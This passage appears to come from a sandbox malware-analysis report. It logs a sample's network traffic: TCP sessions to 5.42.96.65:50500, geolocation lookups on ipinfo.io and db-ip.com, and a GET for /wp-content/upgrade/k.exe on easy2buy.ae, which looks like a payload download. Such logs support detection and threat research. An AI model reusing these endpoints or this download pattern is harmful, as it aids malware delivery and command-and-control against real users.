                                                                        May 12, 2024 12:31:55.730720997 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730735064 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730736017 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730751991 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730765104 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.730766058 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:55.730819941 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:55.806763887 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:56.170089006 CEST50500497245.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:56.170161963 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:56.533299923 CEST50500497245.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:56.571336985 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:56.934916973 CEST50500497245.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:56.935048103 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:57.350653887 CEST50500497245.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:57.602083921 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:57.652494907 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:57.991442919 CEST50500497065.42.96.65192.168.2.5
                                                                        May 12, 2024 12:31:57.993104935 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:58.871303082 CEST4970650500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:31:59.965122938 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:32:00.350857019 CEST50500497245.42.96.65192.168.2.5
                                                                        May 12, 2024 12:32:00.402479887 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:32:30.746364117 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:32:31.141252041 CEST50500497245.42.96.65192.168.2.5
                                                                        May 12, 2024 12:32:31.183825016 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:32:46.840226889 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:32:47.234889030 CEST50500497245.42.96.65192.168.2.5
                                                                        May 12, 2024 12:32:47.277584076 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:32:53.482594013 CEST4972450500192.168.2.55.42.96.65
                                                                        May 12, 2024 12:32:53.867929935 CEST50500497245.42.96.65192.168.2.5
                                                                        May 12, 2024 12:32:53.918323040 CEST4972450500192.168.2.55.42.96.65

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        May 12, 2024 12:30:57.505943060 CEST5776253192.168.2.51.1.1.1
                                                                        May 12, 2024 12:30:57.676301956 CEST53577621.1.1.1192.168.2.5
                                                                        May 12, 2024 12:30:58.398008108 CEST5060453192.168.2.51.1.1.1
                                                                        May 12, 2024 12:30:58.561959982 CEST53506041.1.1.1192.168.2.5
                                                                        May 12, 2024 12:31:48.406987906 CEST6450653192.168.2.51.1.1.1
                                                                        May 12, 2024 12:31:49.007366896 CEST53645061.1.1.1192.168.2.5

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        May 12, 2024 12:30:57.505943060 CEST192.168.2.51.1.1.10x9a5eStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                        May 12, 2024 12:30:58.398008108 CEST192.168.2.51.1.1.10x2db7Standard query (0)db-ip.comA (IP address)IN (0x0001)false
                                                                        May 12, 2024 12:31:48.406987906 CEST192.168.2.51.1.1.10xe086Standard query (0)easy2buy.aeA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        May 12, 2024 12:30:57.676301956 CEST1.1.1.1192.168.2.50x9a5eNo error (0)ipinfo.io34.117.186.192A (IP address)IN (0x0001)false
                                                                        May 12, 2024 12:30:58.561959982 CEST1.1.1.1192.168.2.50x2db7No error (0)db-ip.com172.67.75.166A (IP address)IN (0x0001)false
                                                                        May 12, 2024 12:30:58.561959982 CEST1.1.1.1192.168.2.50x2db7No error (0)db-ip.com104.26.5.15A (IP address)IN (0x0001)false
                                                                        May 12, 2024 12:30:58.561959982 CEST1.1.1.1192.168.2.50x2db7No error (0)db-ip.com104.26.4.15A (IP address)IN (0x0001)false
                                                                        May 12, 2024 12:31:49.007366896 CEST1.1.1.1192.168.2.50xe086No error (0)easy2buy.ae185.199.220.53A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • https:
                                                                          • ipinfo.io
                                                                        • db-ip.com
                                                                        • easy2buy.ae

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.549719185.199.220.53802608C:\Users\user\Desktop\file.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 12, 2024 12:31:49.309426069 CEST169OUTData Raw: 16 03 03 00 a4 01 00 00 a0 03 03 66 40 9a 94 a2 f7 ec 2e 34 5a 35 64 8b fd bc e9 db 44 bc 57 70 43 45 b5 77 4c a0 96 86 e5 b3 28 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f
                                                                        Data Ascii: f@.4Z5dDWpCEwL(&,+0/$#('=<5/Qeasy2buy.ae#
                                                                        May 12, 2024 12:31:49.609438896 CEST948INHTTP/1.1 405 Method Not Allowed
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 702
                                                                        date: Sun, 12 May 2024 10:31:49 GMT
                                                                        server: LiteSpeed
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 405 Method Not Allowed</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">405</h1><h2 style="margin-top:20px;font-size: 30px;">Method Not Allowed</h2><p>This type request is not allowed!</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.549720185.199.220.53802608C:\Users\user\Desktop\file.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 12, 2024 12:31:49.912662029 CEST115OUTData Raw: 16 03 01 00 6e 01 00 00 6a 03 01 66 40 9a 95 bb 3e 44 41 a0 8b 77 52 b5 98 a3 57 3c db ea 5a 11 ab 20 a6 77 0a 95 bd 1c dc 7c 6a 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 33 00 00 00 10 00 0e 00 00 0b 65 61 73 79 32 62 75 79 2e
                                                                        Data Ascii: njf@>DAwRW<Z w|j5/3easy2buy.ae#
                                                                        May 12, 2024 12:31:50.211469889 CEST948INHTTP/1.1 405 Method Not Allowed
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 702
                                                                        date: Sun, 12 May 2024 10:31:50 GMT
                                                                        server: LiteSpeed
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 405 Method Not Allowed</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">405</h1><h2 style="margin-top:20px;font-size: 30px;">Method Not Allowed</h2><p>This type request is not allowed!</p></div></div></body></html>


                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.54970734.117.186.1924432608C:\Users\user\Desktop\file.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-05-12 10:30:58 UTC237OUTGET /widget/demo/81.181.60.11 HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Referer: https://ipinfo.io/
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                        Host: ipinfo.io
                                                                        2024-05-12 10:30:58 UTC513INHTTP/1.1 200 OK
                                                                        server: nginx/1.24.0
                                                                        date: Sun, 12 May 2024 10:30:58 GMT
                                                                        content-type: application/json; charset=utf-8
                                                                        Content-Length: 985
                                                                        access-control-allow-origin: *
                                                                        x-frame-options: SAMEORIGIN
                                                                        x-xss-protection: 1; mode=block
                                                                        x-content-type-options: nosniff
                                                                        referrer-policy: strict-origin-when-cross-origin
                                                                        x-envoy-upstream-service-time: 2
                                                                        via: 1.1 google
                                                                        strict-transport-security: max-age=2592000; includeSubDomains
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close
                                                                        2024-05-12 10:30:58 UTC742INData Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 31 2e 31 38 31 2e 36 30 2e 31 31 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 31 2e 31 38 31 2e 36 30 2e 31 31 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 53 65 61 74 74 6c 65 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 37 2e 36 30 36 32 2c 2d 31 32 32 2e 33 33 32 31 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 39 38 31 30 31 22 2c 0a 20 20 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72
                                                                        Data Ascii: { "input": "81.181.60.11", "data": { "ip": "81.181.60.11", "city": "Seattle", "region": "Washington", "country": "US", "loc": "47.6062,-122.3321", "org": "AS212238 Datacamp Limited", "postal": "98101", "timezone": "Amer
                                                                        2024-05-12 10:30:58 UTC243INData Raw: 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 41 76 65 72 65 73 63 75 20 4d 61 72 65 73 61 6c 20 38 2d 31 30 2c 20 42 75 63 68 61 72 65 73 74 2c 20 52 6f 6d 61 6e 69 61 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 52 4f 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 2d 62 69 6e 62 6f 78 40 72 6e 63 2e 72 6f 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 63 6f 6e 74 61 63 74 20 72 6f 6c 65 20 6f 62 6a 65 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 31 2e 31 38 31 2e 34 38 2e 30 2f 32 30 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 34 30 20 33 37 38 20 36 30 30 20 30 30 30 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d
                                                                        Data Ascii: "address": "Averescu Maresal 8-10, Bucharest, Romania", "country": "RO", "email": "abuse-binbox@rnc.ro", "name": "Abuse contact role object", "network": "81.181.48.0/20", "phone": "+40 378 600 000" } }}


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.549708172.67.75.1664432608C:\Users\user\Desktop\file.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-05-12 10:30:58 UTC261OUTGET /demo/home.php?s=81.181.60.11 HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                        Host: db-ip.com
                                                                        2024-05-12 10:30:59 UTC656INHTTP/1.1 200 OK
                                                                        Date: Sun, 12 May 2024 10:30:59 GMT
                                                                        Content-Type: application/json
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        x-iplb-request-id: AC4417BB:7DAA_93878F2E:0050_66409A63_CDD4269:7B63
                                                                        x-iplb-instance: 59128
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LetULO1IO%2BWWtilwAfCHJzplUPgQCmwi%2FA%2BYFwgWcDE7I02tZkwL3UzWIKK3L4iKmMGbzW6WUV5JTVnA%2BABK9o5c3YVP4lPAzl3zx9P2bdWmYSuQhzyy819KkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8829bc8bec6c7624-SEA
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2024-05-12 10:30:59 UTC85INData Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a
                                                                        Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
                                                                        2024-05-12 10:30:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.549722185.199.220.534432608C:\Users\user\Desktop\file.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-05-12 10:31:51 UTC229OUTGET /wp-content/upgrade/k.exe HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
                                                                        Host: easy2buy.ae
                                                                        Cache-Control: no-cache
                                                                        2024-05-12 10:31:52 UTC522INHTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                                        content-type: text/html; charset=UTF-8
                                                                        link: <https://easy2buy.ae/wp-json/>; rel="https://api.w.org/"
                                                                        transfer-encoding: chunked
                                                                        date: Sun, 12 May 2024 10:31:52 GMT
                                                                        server: LiteSpeed
                                                                        vary: User-Agent
                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                        2024-05-12 10:31:52 UTC846INData Raw: 38 62 33 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 61 73 79 32 62 75 79 2e 61 65 2f 78 6d 6c 72 70 63
                                                                        Data Ascii: 8b39<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link rel="profile" href="http://gmpg.org/xfn/11" /><link rel="pingback" href="https://easy2buy.ae/xmlrpc
                                                                        2024-05-12 10:31:52 UTC14994INData Raw: 69 70 74 69 6f 6e 22 3a 22 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 65 61 73 79 32 62 75 79 2e 61 65 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 7d 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 7b 22 40 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 73 3a 2f 2f 65 61 73 79 32 62 75 79 2e 61 65 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22 7d 2c 22 71 75 65 72 79 2d 69 6e 70 75 74 22 3a 22 72 65 71 75 69 72 65 64 20 6e 61 6d 65 3d 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 22 7d 5d 2c 22 69
                                                                        Data Ascii: iption":"","publisher":{"@id":"https://easy2buy.ae/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://easy2buy.ae/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"i
                                                                        2024-05-12 10:31:52 UTC16384INData Raw: 69 6d 65 6c 69 6e 65 2e 71 6f 64 65 66 2d 70 6f 69 6e 74 2d 2d 64 69 61 6d 6f 6e 64 20 2e 71 6f 64 65 66 2d 65 2d 70 6f 69 6e 74 2d 68 6f 6c 64 65 72 3a 62 65 66 6f 72 65 2c 20 2e 71 6f 64 65 66 2d 77 69 64 67 65 74 2d 62 6c 6f 63 6b 2d 34 65 33 37 35 31 34 35 20 2e 71 69 2d 62 6c 6f 63 6b 2d 74 69 6d 65 6c 69 6e 65 2e 71 6f 64 65 66 2d 70 6f 69 6e 74 2d 2d 64 69 61 6d 6f 6e 64 20 2e 71 6f 64 65 66 2d 65 2d 70 6f 69 6e 74 2d 68 6f 6c 64 65 72 3a 61 66 74 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 62 65 62 65 62 3b 7d 20 62 6f 64 79 20 20 2e 71 6f 64 65 66 2d 77 69 64 67 65 74 2d 62 6c 6f 63 6b 2d 34 65 33 37 35 31 34 35 20 2e 71 69 2d 62 6c 6f 63 6b 2d 74 69 6d 65 6c 69 6e 65 20 2e 71 6f 64 65 66 2d 65 2d 70 6f 69 6e 74 7b 62 61
                                                                        Data Ascii: imeline.qodef-point--diamond .qodef-e-point-holder:before, .qodef-widget-block-4e375145 .qi-block-timeline.qodef-point--diamond .qodef-e-point-holder:after{background-color: #ebebeb;} body .qodef-widget-block-4e375145 .qi-block-timeline .qodef-e-point{ba
                                                                        2024-05-12 10:31:52 UTC3425INData Raw: 2d 74 79 70 65 3a 20 64 69 73 63 3b 7d 20 62 6f 64 79 20 20 2e 71 6f 64 65 66 2d 77 69 64 67 65 74 2d 62 6c 6f 63 6b 2d 38 66 64 64 31 64 65 61 20 2e 71 69 2d 62 6c 6f 63 6b 2d 74 61 67 2d 63 6c 6f 75 64 20 2e 71 6f 64 65 66 2d 65 2d 69 74 65 6d 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 36 70 78 3b 7d 20 62 6f 64 79 20 20 2e 71 6f 64 65 66 2d 77 69 64 67 65 74 2d 62 6c 6f 63 6b 2d 39 31 36 61 32 66 62 66 20 2e 71 69 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 2d 6f 66 2d 63 6f 6e 74 65 6e 74 73 20 2e 71 6f 64 65 66 2d 6d 2d 74 61 62 6c 65 2d 63 6f 6e 74 65 6e 74 20 75 6c 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 20 64 69 73 63 3b 7d 20 62 6f 64 79 20 20 2e 71 6f 64 65 66 2d 77
                                                                        Data Ascii: -type: disc;} body .qodef-widget-block-8fdd1dea .qi-block-tag-cloud .qodef-e-item{text-decoration: underline;font-size: 26px;} body .qodef-widget-block-916a2fbf .qi-block-table-of-contents .qodef-m-table-content ul{list-style-type: disc;} body .qodef-w
                                                                        2024-05-12 10:31:52 UTC8359INData Raw: 32 30 39 66 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 69 6e 6c 69 6e 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 66 6f 72 6d 20 2e 66 6f 72 6d 2d 72 6f 77 20 2e 72 65 71 75 69 72 65 64 20 7b 20 76 69 73 69 62 69 6c 69 74 79 3a 20 76 69 73 69 62 6c 65 3b 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 68 66 65 2d 73 74 79 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 65 61 73 79 32 62 75 79 2e 61 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 68 65 61 64 65 72 2d 66 6f 6f 74 65 72 2d 65 6c 65 6d 65 6e 74 6f 72 2f 61 73 73 65 74 73 2f
                                                                        Data Ascii: 209f<style id='woocommerce-inline-inline-css' type='text/css'>.woocommerce form .form-row .required { visibility: visible; }</style><link rel='stylesheet' id='hfe-style-css' href='https://easy2buy.ae/wp-content/plugins/header-footer-elementor/assets/
                                                                        2024-05-12 10:31:52 UTC12844INData Raw: 33 32 32 34 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 61 73 79 32 62 75 79 2e 61 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 36 2f 63 72 6f 70 70 65 64 2d 66 61 76 2d 31 39 32 78 31 39 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 39 32 78 31 39 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 61 73 79 32 62 75 79 2e 61 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 36 2f 63 72 6f 70 70 65 64 2d 66 61 76 2d 31 38 30 78 31 38 30 2e 70 6e 67 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e
                                                                        Data Ascii: 3224<link rel="icon" href="https://easy2buy.ae/wp-content/uploads/2023/06/cropped-fav-192x192.png" sizes="192x192" /><link rel="apple-touch-icon" href="https://easy2buy.ae/wp-content/uploads/2023/06/cropped-fav-180x180.png" /><meta name="msapplication
                                                                        2024-05-12 10:31:52 UTC16384INData Raw: 34 39 31 66 0d 0a 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 34 30 34 20 74 68 65 6d 65 2d 6e 65 77 68 6f 6d 65 20 71 69 2d 62 6c 6f 63 6b 73 2d 31 2e 32 20 71 6f 64 65 66 2d 67 75 74 65 6e 62 65 72 67 2d 2d 6e 6f 2d 74 6f 75 63 68 20 71 6f 64 65 2d 66 72 61 6d 65 77 6f 72 6b 2d 31 2e 32 2e 32 20 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6e 6f 2d 6a 73 20 65 68 66 2d 68 65 61 64 65 72 20 65 68 66 2d 66 6f 6f 74 65 72 20 65 68 66 2d 74 65 6d 70 6c 61 74 65 2d 6e 65 77 68 6f 6d 65 20 65 68 66 2d 73 74 79 6c 65 73 68 65 65 74 2d 6e 65 77 68 6f 6d 65 20 71 6f 64 65 66 2d 71 69 2d 2d 6e 6f 2d 74 6f 75 63 68 20 71 69 2d 61 64 64 6f 6e 73 2d 66 6f 72 2d 65 6c 65 6d 65 6e 74 6f 72 2d 31 2e 36
                                                                        Data Ascii: 491f</style></head><body class="error404 theme-newhome qi-blocks-1.2 qodef-gutenberg--no-touch qode-framework-1.2.2 woocommerce-no-js ehf-header ehf-footer ehf-template-newhome ehf-stylesheet-newhome qodef-qi--no-touch qi-addons-for-elementor-1.6
